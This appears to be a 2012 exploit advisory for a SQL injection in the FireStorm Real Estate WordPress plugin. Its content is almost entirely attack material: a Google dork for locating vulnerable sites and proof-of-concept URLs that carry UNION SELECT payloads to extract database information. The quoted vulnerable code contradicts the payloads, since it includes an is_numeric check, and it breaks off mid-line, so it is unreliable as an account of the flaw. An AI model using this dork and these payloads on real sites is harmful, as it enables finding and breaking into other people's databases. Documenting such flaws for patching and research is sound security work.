Title                  => FireStorm Real Estate SQL Injection.
Date                  => 10/19/2012
Version              => 2.06.08
Vendor               => http://www.firestormplugins.com
Tested on          => Microsoft Windows 7, Linux BackBox.
Discovered by     => B00B5 [http://www.hackforums.net/member.php?action=profile&uid=1403300]
Download          => http://wordpress.org/extend/plugins/fs-real-estate-plugin/
Google Dork       => inurl:"/xml/marker_listings.xml?id" filetype:xml

Vulnerable Code => if (isset($_GET['id'])) {
                   if (is_numeric($_GET['id'])) {
  
                 $query = "SELECT * FROM ".$table_prefix."fsrep_listings
 WHERE listing_long != '' AND listing_lat != '' AND listing_id = 
".$_GET['id'

PoC           => /wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=[SQL Query]
                => /wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=null UNION SELECT 1,2,3,4,version()--

Demo           
 => 
/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=null
 UNION SELECT 
1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--